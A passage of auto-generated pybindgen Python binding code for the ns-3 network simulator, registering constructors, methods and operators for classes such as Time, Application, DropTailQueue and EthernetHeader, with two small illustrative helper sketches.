cls.add_binary_numeric_operator('+', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('!=')
cls.add_inplace_numeric_operator('+=', param('ns3::Time const &', 'right'))
cls.add_inplace_numeric_operator('-=', param('ns3::Time const &', 'right'))
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>=')
## nstime.h (module 'core'): ns3::Time::Time() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::Time::Time(ns3::Time const & o) [copy constructor]
cls.add_constructor([param('ns3::Time const &', 'o')])
## nstime.h (module 'core'): ns3::Time::Time(double v) [constructor]
cls.add_constructor([param('double', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(int v) [constructor]
cls.add_constructor([param('int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long int v) [constructor]
cls.add_constructor([param('long int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long long int v) [constructor]
cls.add_constructor([param('long long int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(unsigned int v) [constructor]
cls.add_constructor([param('unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long unsigned int v) [constructor]
cls.add_constructor([param('long unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long long unsigned int v) [constructor]
cls.add_constructor([param('long long unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(std::string const & s) [constructor]
cls.add_constructor([param('std::string const &', 's')])
## nstime.h (module 'core'): ns3::Time::Time(ns3::int64x64_t const & value) [constructor]
cls.add_constructor([param('ns3::int64x64_t const &', 'value')])
## nstime.h (module 'core'): int ns3::Time::Compare(ns3::Time const & o) const [member function]
cls.add_method('Compare',
'int',
[param('ns3::Time const &', 'o')],
is_const=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & from, ns3::Time::Unit timeUnit) [member function]
cls.add_method('From',
'ns3::Time',
[param('ns3::int64x64_t const &', 'from'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & value) [member function]
cls.add_method('From',
'ns3::Time',
[param('ns3::int64x64_t const &', 'value')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::FromDouble(double value, ns3::Time::Unit timeUnit) [member function]
cls.add_method('FromDouble',
'ns3::Time',
[param('double', 'value'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::FromInteger(uint64_t value, ns3::Time::Unit timeUnit) [member function]
cls.add_method('FromInteger',
'ns3::Time',
[param('uint64_t', 'value'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): double ns3::Time::GetDouble() const [member function]
cls.add_method('GetDouble',
'double',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetFemtoSeconds() const [member function]
cls.add_method('GetFemtoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetInteger() const [member function]
cls.add_method('GetInteger',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetMicroSeconds() const [member function]
cls.add_method('GetMicroSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetMilliSeconds() const [member function]
cls.add_method('GetMilliSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetNanoSeconds() const [member function]
cls.add_method('GetNanoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetPicoSeconds() const [member function]
cls.add_method('GetPicoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): static ns3::Time::Unit ns3::Time::GetResolution() [member function]
cls.add_method('GetResolution',
'ns3::Time::Unit',
[],
is_static=True)
## nstime.h (module 'core'): double ns3::Time::GetSeconds() const [member function]
cls.add_method('GetSeconds',
'double',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetTimeStep() const [member function]
cls.add_method('GetTimeStep',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsNegative() const [member function]
cls.add_method('IsNegative',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsPositive() const [member function]
cls.add_method('IsPositive',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsStrictlyNegative() const [member function]
cls.add_method('IsStrictlyNegative',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsStrictlyPositive() const [member function]
cls.add_method('IsStrictlyPositive',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsZero() const [member function]
cls.add_method('IsZero',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): static void ns3::Time::SetResolution(ns3::Time::Unit resolution) [member function]
cls.add_method('SetResolution',
'void',
[param('ns3::Time::Unit', 'resolution')],
is_static=True)
## nstime.h (module 'core'): ns3::int64x64_t ns3::Time::To(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('To',
'ns3::int64x64_t',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
## nstime.h (module 'core'): double ns3::Time::ToDouble(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('ToDouble',
'double',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::ToInteger(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('ToInteger',
'int64_t',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
return
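# Illustrative sketch (not part of the generated output): the registrations
# above expose ns3::Time's constructors, arithmetic/comparison operators and
# const accessors through pybindgen's CppClass API.  The unused helper below
# shows the same calls on a tiny standalone module; the module and class
# names ('sketch', 'Duration', 'GetSeconds') are placeholders for illustration
# only, not ns-3 or pybindgen-generated names.
def _sketch_time_like_registration():
    from pybindgen import Module, param
    mod = Module('sketch')                      # hypothetical module name
    cls = mod.add_class('Duration')             # hypothetical value class
    cls.add_constructor([])
    cls.add_constructor([param('double', 'v')])
    # const accessor, mirroring GetSeconds()/GetDouble() registrations above
    cls.add_method('GetSeconds', 'double', [], is_const=True)
    # operator hooks, mirroring add_binary_comparison_operator('==') etc. above
    cls.add_binary_comparison_operator('==')
    cls.add_output_stream_operator()
    return mod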
def register_Ns3TraceSourceAccessor_methods(root_module, cls):
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor]
cls.add_constructor([])
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Connect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('ConnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Disconnect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('DisconnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Trailer_methods(root_module, cls):
cls.add_output_stream_operator()
## trailer.h (module 'network'): ns3::Trailer::Trailer() [constructor]
cls.add_constructor([])
## trailer.h (module 'network'): ns3::Trailer::Trailer(ns3::Trailer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Trailer const &', 'arg0')])
## trailer.h (module 'network'): uint32_t ns3::Trailer::Deserialize(ns3::Buffer::Iterator end) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'end')],
is_pure_virtual=True, is_virtual=True)
## trailer.h (module 'network'): uint32_t ns3::Trailer::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trailer.h (module 'network'): static ns3::TypeId ns3::Trailer::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## trailer.h (module 'network'): void ns3::Trailer::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trailer.h (module 'network'): void ns3::Trailer::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Application_methods(root_module, cls):
## application.h (module 'network'): ns3::Application::Application(ns3::Application const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Application const &', 'arg0')])
## application.h (module 'network'): ns3::Application::Application() [constructor]
cls.add_constructor([])
## application.h (module 'network'): ns3::Ptr<ns3::Node> ns3::Application::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_const=True)
## application.h (module 'network'): static ns3::TypeId ns3::Application::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## application.h (module 'network'): void ns3::Application::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')])
## application.h (module 'network'): void ns3::Application::SetStartTime(ns3::Time start) [member function]
cls.add_method('SetStartTime',
'void',
[param('ns3::Time', 'start')])
## application.h (module 'network'): void ns3::Application::SetStopTime(ns3::Time stop) [member function]
cls.add_method('SetStopTime',
'void',
[param('ns3::Time', 'stop')])
## application.h (module 'network'): void ns3::Application::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## application.h (module 'network'): void ns3::Application::DoStart() [member function]
cls.add_method('DoStart',
'void',
[],
visibility='protected', is_virtual=True)
## application.h (module 'network'): void ns3::Application::StartApplication() [member function]
cls.add_method('StartApplication',
'void',
[],
visibility='private', is_virtual=True)
## application.h (module 'network'): void ns3::Application::StopApplication() [member function]
cls.add_method('StopApplication',
'void',
[],
visibility='private', is_virtual=True)
return
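# Illustrative sketch (not part of the generated output): Application's
# DoDispose/DoStart/StartApplication/StopApplication are registered above with
# visibility='protected'/'private' and is_virtual=True so that Python
# subclasses can override the corresponding C++ virtual hooks.  The unused
# helper below shows the same keyword arguments on a placeholder class; the
# names ('sketch_app', 'AppBase', 'DoInitialize', 'DoRun') are assumptions for
# illustration only.
def _sketch_virtual_hook_registration():
    from pybindgen import Module
    mod = Module('sketch_app')                              # hypothetical module name
    cls = mod.add_class('AppBase', allow_subclassing=True)  # hypothetical base class
    cls.add_constructor([])
    # protected virtual: overridable from Python subclasses
    cls.add_method('DoInitialize', 'void', [],
                   visibility='protected', is_virtual=True)
    # private pure virtual: Python subclasses are expected to implement it
    cls.add_method('DoRun', 'void', [],
                   is_pure_virtual=True, visibility='private', is_virtual=True)
    return mod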
def register_Ns3AttributeAccessor_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
cls.add_method('Get',
'bool',
[param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasGetter() const [member function]
cls.add_method('HasGetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::HasSetter() const [member function]
cls.add_method('HasSetter',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Set(ns3::ObjectBase * object, ns3::AttributeValue const & value) const [member function]
cls.add_method('Set',
'bool',
[param('ns3::ObjectBase *', 'object', transfer_ownership=False), param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeChecker_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker(ns3::AttributeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeChecker::AttributeChecker() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
[param('ns3::AttributeValue const &', 'value')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::Copy(ns3::AttributeValue const & source, ns3::AttributeValue & destination) const [member function]
cls.add_method('Copy',
'bool',
[param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeChecker::CreateValidValue(ns3::AttributeValue const & value) const [member function]
cls.add_method('CreateValidValue',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::AttributeValue const &', 'value')],
is_const=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetUnderlyingTypeInformation() const [member function]
cls.add_method('GetUnderlyingTypeInformation',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeChecker::GetValueTypeName() const [member function]
cls.add_method('GetValueTypeName',
'std::string',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeChecker::HasUnderlyingTypeInformation() const [member function]
cls.add_method('HasUnderlyingTypeInformation',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3AttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue(ns3::AttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeValue::AttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## attribute.h (module 'core'): bool ns3::AttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_virtual=True)
## attribute.h (module 'core'): std::string ns3::AttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3BooleanChecker_methods(root_module, cls):
## boolean.h (module 'core'): ns3::BooleanChecker::BooleanChecker() [constructor]
cls.add_constructor([])
## boolean.h (module 'core'): ns3::BooleanChecker::BooleanChecker(ns3::BooleanChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::BooleanChecker const &', 'arg0')])
return
def register_Ns3BooleanValue_methods(root_module, cls):
cls.add_output_stream_operator()
## boolean.h (module 'core'): ns3::BooleanValue::BooleanValue(ns3::BooleanValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::BooleanValue const &', 'arg0')])
## boolean.h (module 'core'): ns3::BooleanValue::BooleanValue() [constructor]
cls.add_constructor([])
## boolean.h (module 'core'): ns3::BooleanValue::BooleanValue(bool value) [constructor]
cls.add_constructor([param('bool', 'value')])
## boolean.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::BooleanValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## boolean.h (module 'core'): bool ns3::BooleanValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## boolean.h (module 'core'): bool ns3::BooleanValue::Get() const [member function]
cls.add_method('Get',
'bool',
[],
is_const=True)
## boolean.h (module 'core'): std::string ns3::BooleanValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## boolean.h (module 'core'): void ns3::BooleanValue::Set(bool value) [member function]
cls.add_method('Set',
'void',
[param('bool', 'value')])
return
def register_Ns3CallbackChecker_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackChecker::CallbackChecker(ns3::CallbackChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')])
return
def register_Ns3CallbackImplBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackImplBase::CallbackImplBase(ns3::CallbackImplBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')])
## callback.h (module 'core'): bool ns3::CallbackImplBase::IsEqual(ns3::Ptr<ns3::CallbackImplBase const> other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3CallbackValue_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::CallbackValue::CallbackValue(ns3::CallbackBase const & base) [constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'base')])
## callback.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::CallbackValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## callback.h (module 'core'): bool ns3::CallbackValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## callback.h (module 'core'): std::string ns3::CallbackValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## callback.h (module 'core'): void ns3::CallbackValue::Set(ns3::CallbackBase base) [member function]
cls.add_method('Set',
'void',
[param('ns3::CallbackBase', 'base')])
return
def register_Ns3Channel_methods(root_module, cls):
## channel.h (module 'network'): ns3::Channel::Channel(ns3::Channel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Channel const &', 'arg0')])
## channel.h (module 'network'): ns3::Channel::Channel() [constructor]
cls.add_constructor([])
## channel.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Channel::GetDevice(uint32_t i) const [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'i')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## channel.h (module 'network'): uint32_t ns3::Channel::GetId() const [member function]
cls.add_method('GetId',
'uint32_t',
[],
is_const=True)
## channel.h (module 'network'): uint32_t ns3::Channel::GetNDevices() const [member function]
cls.add_method('GetNDevices',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## channel.h (module 'network'): static ns3::TypeId ns3::Channel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3DataRateChecker_methods(root_module, cls):
## data-rate.h (module 'network'): ns3::DataRateChecker::DataRateChecker() [constructor]
cls.add_constructor([])
## data-rate.h (module 'network'): ns3::DataRateChecker::DataRateChecker(ns3::DataRateChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DataRateChecker const &', 'arg0')])
return
def register_Ns3DataRateValue_methods(root_module, cls):
## data-rate.h (module 'network'): ns3::DataRateValue::DataRateValue() [constructor]
cls.add_constructor([])
## data-rate.h (module 'network'): ns3::DataRateValue::DataRateValue(ns3::DataRateValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DataRateValue const &', 'arg0')])
## data-rate.h (module 'network'): ns3::DataRateValue::DataRateValue(ns3::DataRate const & value) [constructor]
cls.add_constructor([param('ns3::DataRate const &', 'value')])
## data-rate.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::DataRateValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## data-rate.h (module 'network'): bool ns3::DataRateValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## data-rate.h (module 'network'): ns3::DataRate ns3::DataRateValue::Get() const [member function]
cls.add_method('Get',
'ns3::DataRate',
[],
is_const=True)
## data-rate.h (module 'network'): std::string ns3::DataRateValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## data-rate.h (module 'network'): void ns3::DataRateValue::Set(ns3::DataRate const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::DataRate const &', 'value')])
return
def register_Ns3DropTailQueue_methods(root_module, cls):
## drop-tail-queue.h (module 'network'): ns3::DropTailQueue::DropTailQueue(ns3::DropTailQueue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DropTailQueue const &', 'arg0')])
## drop-tail-queue.h (module 'network'): ns3::DropTailQueue::DropTailQueue() [constructor]
cls.add_constructor([])
## drop-tail-queue.h (module 'network'): ns3::Queue::QueueMode ns3::DropTailQueue::GetMode() [member function]
cls.add_method('GetMode',
'ns3::Queue::QueueMode',
[])
## drop-tail-queue.h (module 'network'): static ns3::TypeId ns3::DropTailQueue::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## drop-tail-queue.h (module 'network'): void ns3::DropTailQueue::SetMode(ns3::Queue::QueueMode mode) [member function]
cls.add_method('SetMode',
'void',
[param('ns3::Queue::QueueMode', 'mode')])
## drop-tail-queue.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::DropTailQueue::DoDequeue() [member function]
cls.add_method('DoDequeue',
'ns3::Ptr< ns3::Packet >',
[],
visibility='private', is_virtual=True)
## drop-tail-queue.h (module 'network'): bool ns3::DropTailQueue::DoEnqueue(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('DoEnqueue',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')],
visibility='private', is_virtual=True)
## drop-tail-queue.h (module 'network'): ns3::Ptr<const ns3::Packet> ns3::DropTailQueue::DoPeek() const [member function]
cls.add_method('DoPeek',
'ns3::Ptr< ns3::Packet const >',
[],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3EmptyAttributeValue_methods(root_module, cls):
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue(ns3::EmptyAttributeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
## attribute.h (module 'core'): ns3::EmptyAttributeValue::EmptyAttributeValue() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EmptyAttributeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, visibility='private', is_virtual=True)
## attribute.h (module 'core'): bool ns3::EmptyAttributeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
visibility='private', is_virtual=True)
## attribute.h (module 'core'): std::string ns3::EmptyAttributeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3ErrorModel_methods(root_module, cls):
## error-model.h (module 'network'): ns3::ErrorModel::ErrorModel(ns3::ErrorModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ErrorModel const &', 'arg0')])
## error-model.h (module 'network'): ns3::ErrorModel::ErrorModel() [constructor]
cls.add_constructor([])
## error-model.h (module 'network'): void ns3::ErrorModel::Disable() [member function]
cls.add_method('Disable',
'void',
[])
## error-model.h (module 'network'): void ns3::ErrorModel::Enable() [member function]
cls.add_method('Enable',
'void',
[])
## error-model.h (module 'network'): static ns3::TypeId ns3::ErrorModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## error-model.h (module 'network'): bool ns3::ErrorModel::IsCorrupt(ns3::Ptr<ns3::Packet> pkt) [member function]
cls.add_method('IsCorrupt',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'pkt')])
## error-model.h (module 'network'): bool ns3::ErrorModel::IsEnabled() const [member function]
cls.add_method('IsEnabled',
'bool',
[],
is_const=True)
## error-model.h (module 'network'): void ns3::ErrorModel::Reset() [member function]
cls.add_method('Reset',
'void',
[])
## error-model.h (module 'network'): bool ns3::ErrorModel::DoCorrupt(ns3::Ptr<ns3::Packet> arg0) [member function]
cls.add_method('DoCorrupt',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'arg0')],
is_pure_virtual=True, visibility='private', is_virtual=True)
## error-model.h (module 'network'): void ns3::ErrorModel::DoReset() [member function]
cls.add_method('DoReset',
'void',
[],
is_pure_virtual=True, visibility='private', is_virtual=True)
return
def register_Ns3EthernetHeader_methods(root_module, cls):
## ethernet-header.h (module 'network'): ns3::EthernetHeader::EthernetHeader(ns3::EthernetHeader const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EthernetHeader const &', 'arg0')])
## ethernet-header.h (module 'network'): ns3::EthernetHeader::EthernetHeader(bool hasPreamble) [constructor]
cls.add_constructor([param('bool', 'hasPreamble')])
## ethernet-header.h (module 'network'): ns3::EthernetHeader::EthernetHeader() [constructor]
cls.add_constructor([])
## ethernet-header.h (module 'network'): uint32_t ns3::EthernetHeader::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## ethernet-header.h (module 'network'): ns3::Mac48Address ns3::EthernetHeader::GetDestination() const [member function]
cls.add_method('GetDestination',
'ns3::Mac48Address',
[],
is_const=True)
## ethernet-header.h (module 'network'): uint32_t ns3::EthernetHeader::GetHeaderSize() const [member function]
cls.add_method('GetHeaderSize',
'uint32_t',
[],
is_const=True)
## ethernet-header.h (module 'network'): ns3::TypeId ns3::EthernetHeader::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## ethernet-header.h (module 'network'): uint16_t ns3::EthernetHeader::GetLengthType() const [member function]
cls.add_method('GetLengthType',
'uint16_t',
[],
is_const=True)
## ethernet-header.h (module 'network'): ns3::ethernet_header_t ns3::EthernetHeader::GetPacketType() const [member function]
cls.add_method('GetPacketType',
'ns3::ethernet_header_t',
[],
is_const=True)
